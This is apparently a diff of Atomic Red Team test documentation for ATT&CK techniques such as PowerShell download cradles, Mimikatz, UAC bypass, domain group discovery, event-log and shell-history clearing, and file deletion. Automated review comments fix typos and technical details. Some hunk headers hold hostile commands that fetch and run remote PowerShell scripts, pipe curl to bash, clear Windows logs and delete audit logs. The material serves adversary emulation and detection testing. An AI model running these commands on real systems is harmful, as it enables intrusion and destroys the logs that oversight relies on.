@@ -133,15 +137,17 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
<br/>
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
**Supported Platforms:** Windows
**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -168,13 +174,15 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
<br/>
## Atomic Test #4 - Obfuscation Tests
auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
**Supported Platforms:** Windows
**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
@@ -196,13 +204,15 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
<br/>
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d
@@ -222,15 +232,17 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
<br/>
## Atomic Test #6 - Invoke-AppPathBypass
auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372
Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372
@@ -250,15 +262,17 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
<br/>
## Atomic Test #7 - Powershell MsXml COM object - with prompt
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
#### Inputs:
@@ -283,15 +297,17 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
<br/>
## Atomic Test #8 - Powershell XML requests
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6
#### Inputs:
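Review bot: "dispalyed" in the description line is misspelled ("displayed"). The fix belongs in the test's YAML description, since this Markdown is generated.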
@@ -316,15 +332,17 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
<br/>
## Atomic Test #9 - Powershell invoke mshta.exe download
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af
#### Inputs:
@@ -349,14 +367,16 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
<br/>
## Atomic Test #10 - Powershell Invoke-DownloadCradle
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
#### Run it with these steps!
@@ -373,14 +393,16 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
## Atomic Test #11 - PowerShell Fileless Script Execution
auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
**Supported Platforms:** Windows
**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73
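Review bot: "exection" in the description line is misspelled ("execution"). Fix it in the test's YAML description rather than in this generated Markdown.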
@@ -407,15 +429,17 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
<br/>
## Atomic Test #12 - PowerShell Downgrade Attack
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
This test requires the manual installation of PowerShell V2.
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
@@ -447,13 +471,15 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
<br/>
## Atomic Test #13 - NTFS Alternate Data Stream Access
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
#### Inputs:
@@ -496,14 +522,16 @@ Write-Host Prereq's for this test cannot be met automatically
<br/>
## Atomic Test #14 - PowerShell Session Creation and Use
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd
#### Inputs:
@@ -550,13 +578,15 @@ Enable-PSRemoting
<br/>
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations
auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7
Executes powershell.exe with variations of the -Command parameter
**Supported Platforms:** Windows
**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7
#### Inputs:
@@ -596,13 +626,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
<br/>
## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
**Supported Platforms:** Windows
**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790
#### Inputs:
@@ -643,13 +675,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
<br/>
## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
Executes powershell.exe with variations of the -EncodedCommand parameter
**Supported Platforms:** Windows
**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
#### Inputs:
@@ -689,13 +723,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
<br/>
## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
**Supported Platforms:** Windows
**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b
#### Inputs:
+5 -3
@@ -16,16 +16,18 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
<br/>
## Atomic Test #1 - AppleScript
auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2
Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit.
You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request.
Reference: https://github.com/EmpireProject/Empire
**Supported Platforms:** macOS
**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2
+10 -6
@@ -16,13 +16,15 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
<br/>
## Atomic Test #1 - Create and Execute Batch Script
auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388
Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
**Supported Platforms:** Windows
**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388
#### Inputs:
@@ -65,13 +67,15 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
<br/>
## Atomic Test #2 - Writes text to a file and displays it.
auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
**Supported Platforms:** Windows
**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e
#### Inputs:
+10 -6
@@ -16,13 +16,15 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
<br/>
## Atomic Test #1 - Create and Execute Bash Shell Script
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
#### Inputs:
@@ -54,15 +56,17 @@ rm #{script_path}
<br/>
## Atomic Test #2 - Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
+15 -9
@@ -18,15 +18,17 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
<br/>
## Atomic Test #1 - Visual Basic script execution to gather local computer information
auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9
Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9
#### Inputs:
@@ -70,17 +72,19 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
<br/>
## Atomic Test #2 - Encoded VBS code execution
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
**Supported Platforms:** Windows
**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
@@ -123,15 +127,17 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
<br/>
## Atomic Test #3 - Extract Memory via VBA
auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
**Supported Platforms:** Windows
**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
#### Inputs:
+15 -9
@@ -16,13 +16,15 @@ Python comes with many built-in packages to interact with the underlying system,
<br/>
## Atomic Test #1 - Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
Download and execute shell script and write to file then execute locally using Python -c (command mode)
**Supported Platforms:** Linux
**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
#### Inputs:
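Review bot: typo in the test title on this hunk, "command mode arguement" should be "command mode argument"; since the title is rendered as the heading in the generated docs, fix it in the source YAML rather than in this generated file.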
@@ -67,13 +69,15 @@ pip install requests
<br/>
## Atomic Test #2 - Execute Python via scripts (Linux)
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
Create Python file (.py) that downloads and executes shell script via executor arguments
**Supported Platforms:** Linux
**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
#### Inputs:
@@ -129,13 +133,15 @@ pip install requests
<br/>
## Atomic Test #3 - Execute Python via Python executables (Linux)
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
**Supported Platforms:** Linux
**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
#### Inputs:
+15 -9
@@ -16,13 +16,15 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
<br/>
## Atomic Test #1 - Permission Groups Discovery (Local)
auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
Permission Groups Discovery
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
@@ -44,14 +46,16 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
<br/>
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local)
auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
@@ -72,14 +76,16 @@ net localgroup "Administrators"
<br/>
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local)
auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
+40 -24
@@ -26,14 +26,16 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr
<br/>
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
@@ -56,14 +58,16 @@ net group "enterprise admins" /domain
<br/>
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
#### Inputs:
@@ -88,14 +92,16 @@ get-ADPrincipalGroupMembership #{user} | select name
<br/>
## Atomic Test #3 - Elevated group enumeration using net group (Domain)
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
@@ -118,13 +124,15 @@ net group "BUILTIN\Backup Operators" /doma
<br/>
## Atomic Test #4 - Find machines where user has local admin access (PowerView)
auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
@@ -145,13 +153,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
<br/>
## Atomic Test #5 - Find local admins on all machines in domain (PowerView)
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -172,13 +182,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
<br/>
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
#### Inputs:
@@ -204,13 +216,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
<br/>
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
When successful, accounts that do not require kerberos pre-auth will be returned
**Supported Platforms:** Windows
**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -251,14 +265,16 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
<br/>
## Atomic Test #8 - Adfind - Query Active Directory Groups
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
#### Inputs:
+15 -9
@@ -22,13 +22,15 @@ These logs may also be cleared through other mechanisms, such as the event viewe
<br/>
## Atomic Test #1 - Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967
#### Inputs:
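Review bot: the description for this test (and for Test #2 below) omits the elevation requirement, while Test #3 states it; `wevtutil cl` and `Clear-EventLog` both fail with access denied against the Security and System logs from a non-elevated prompt, so add "requires an elevated prompt" to the description, as Test #3 does, so a failed run is not misread as a blocked one.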
@@ -53,15 +55,17 @@ wevtutil cl #{log_name}
<br/>
## Atomic Test #2 - Delete System Logs Using Clear-EventLog
auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498
Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows
**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498
@@ -83,15 +87,17 @@ Get-EventLog -list
<br/>
## Atomic Test #3 - Clear Event Logs via VBA
auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e
This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
**Supported Platforms:** Windows
**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e
+15 -9
@@ -23,13 +23,15 @@
<br/>
## Atomic Test #1 - rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
Delete system and audit logs
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683
@@ -50,13 +52,15 @@ sudo rm -rf /private/var/audit/*
<br/>
## Atomic Test #2 - Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4
#### Inputs:
@@ -81,13 +85,15 @@ echo 0> /var/spool/mail/#{username}
<br/>
## Atomic Test #3 - Overwrite Linux Log
auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5
#### Inputs:
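Review bot: the context line on this hunk's header, `echo 0> /var/spool/mail/#{username}`, does not write the character 0 into the spool; the shell parses `0>` as a redirection of file descriptor 0, so the spool is opened with truncation and left empty while `echo` prints a bare newline to stdout. That is what the Rocke command does, so the command can stay, but the description of Test #2 ("overwrites the Linux mail spool") should say the file is truncated to zero bytes, and a detection should key on the truncation rather than on the content "0". The same applies to Test #3 if it uses the same `0>` form.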
+55 -33
@@ -40,13 +40,15 @@ Adversaries may run the PowerShell command <code>Clear-History</code> to flush t
<br/>
## Atomic Test #1 - Clear Bash history (rm)
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
Clears bash history via rm
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc
@@ -66,13 +68,15 @@ rm ~/.bash_history
<br/>
## Atomic Test #2 - Clear Bash history (echo)
auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
Clears bash history via rm
**Supported Platforms:** Linux
**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
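Review bot: the description on this hunk, "Clears bash history via rm", is copied from Test #1 and contradicts the title "Clear Bash history (echo)" and the command `echo "" > ~/.bash_history` shown in the next hunk header; change it to "Clears bash history via echo". Worth noting in the description too that this variant leaves a one-byte file behind rather than removing it, which is a different artifact from Test #1.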
@@ -92,13 +96,15 @@ echo "" > ~/.bash_history
<br/>
## Atomic Test #3 - Clear Bash history (cat dev/null)
auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
Clears bash history via cat /dev/null
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f
@@ -118,13 +124,15 @@ cat /dev/null > ~/.bash_history
<br/>
## Atomic Test #4 - Clear Bash history (ln dev/null)
auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
Clears bash history via a symlink to /dev/null
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
@@ -144,13 +152,15 @@ ln -sf /dev/null ~/.bash_history
<br/>
## Atomic Test #5 - Clear Bash history (truncate)
auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
Clears bash history via truncate
**Supported Platforms:** Linux
**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739
@@ -170,13 +180,15 @@ truncate -s0 ~/.bash_history
<br/>
## Atomic Test #6 - Clear history of a bunch of shells
auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
Clears the history of a bunch of different shell types by setting the history size to zero
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c
@@ -198,13 +210,15 @@ history -c
<br/>
## Atomic Test #7 - Clear and Disable Bash History Logging
auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
Clears the history and disable bash history logging of the current shell and future shell sessions
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6
@@ -233,13 +247,15 @@ set -o history
<br/>
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History
auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6
Using a space before a command causes the command to not be logged in the Bash History file
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6
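Review bot: the description on this hunk states the leading-space behaviour as unconditional, but bash only drops commands that start with a space when `HISTCONTROL` contains `ignorespace` or `ignoreboth`; on a shell without that setting the ` whoami` shown in the next hunk header is recorded normally and the test silently demonstrates nothing. Add the precondition to the description or set `HISTCONTROL=ignorespace` in the test, and have the verification step check the history file afterwards.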
@@ -260,13 +276,15 @@ whoami
<br/>
## Atomic Test #9 - Disable Bash History Logging with SSH -T
auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
**Supported Platforms:** Linux
**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1
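Review bot: the description on this hunk is a run-on; split it as "Keeps history clear and stays out of lastlog, wtmp and btmp. `ssh -T` keeps the ssh client from requesting a TTY, which is what usually gets logged to lastlog." It should also say what this does not evade: sshd still logs the authentication itself to syslog (auth.log or the journal) regardless of PTY allocation, so the technique only hides the login from the utmp family of files, not from the authentication log.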
@@ -304,13 +322,15 @@ yum -y install sshpass
<br/>
## Atomic Test #10 - Prevent Powershell History Logging
auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
Prevents Powershell history
**Supported Platforms:** Windows
**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370
@@ -334,13 +354,15 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
<br/>
## Atomic Test #11 - Clear Powershell History by Deleting History File
auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
Clears Powershell history
**Supported Platforms:** Windows
**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037
+50 -30
@@ -30,13 +30,15 @@ There are tools available from the host operating system to perform cleanup, but
<br/>
## Atomic Test #1 - Delete a single file - Linux/macOS
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
Delete a single file from the temporary directory
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
#### Inputs:
@@ -61,13 +63,15 @@ rm -f #{file_to_delete}
<br/>
## Atomic Test #2 - Delete an entire folder - Linux/macOS
auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
#### Inputs:
@@ -92,13 +96,15 @@ rm -rf #{folder_to_delete}
<br/>
## Atomic Test #3 - Overwrite and delete a file with shred
auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499
Use the `shred` command to overwrite the temporary file and then delete it
**Supported Platforms:** Linux
**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499
#### Inputs:
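Review bot: the description on this hunk should carry the caveat from the shred man page: overwriting in place is not guaranteed to reach the original blocks on journaled, copy-on-write or snapshotted filesystems (for example ext3/ext4 in data=journal mode, btrfs, ZFS) or on SSDs with wear levelling, so the "overwrite" part of the test may leave the original content recoverable even though the file is unlinked.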
@@ -123,14 +129,16 @@ shred -u #{file_to_shred}
<br/>
## Atomic Test #4 - Delete a single file - Windows cmd
auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3
#### Inputs:
@@ -167,14 +175,16 @@ echo deleteme_T1551.004 >> #{file_to_delete}
<br/>
## Atomic Test #5 - Delete an entire folder - Windows cmd
auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698
#### Inputs:
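Review bot: the context line on this hunk's header, `echo deleteme_T1551.004 >> #{file_to_delete}`, still uses the retired technique ID T1551.004; this technique is T1070.004. The same legacy ID appears in the T1070.006 hunks below ("T1551.006 Timestomp"). Renaming the marker strings keeps the artifacts searchable under the current ID when analysts correlate test runs with detections.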
@@ -211,13 +221,15 @@ mkdir #{folder_to_delete}
<br/>
## Atomic Test #6 - Delete a single file - Windows PowerShell
auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
#### Inputs:
@@ -254,13 +266,15 @@ New-Item -Path #{file_to_delete} | Out-Null
<br/>
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1
#### Inputs:
@@ -297,13 +311,15 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
<br/>
## Atomic Test #8 - Delete Filesystem - Linux
auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
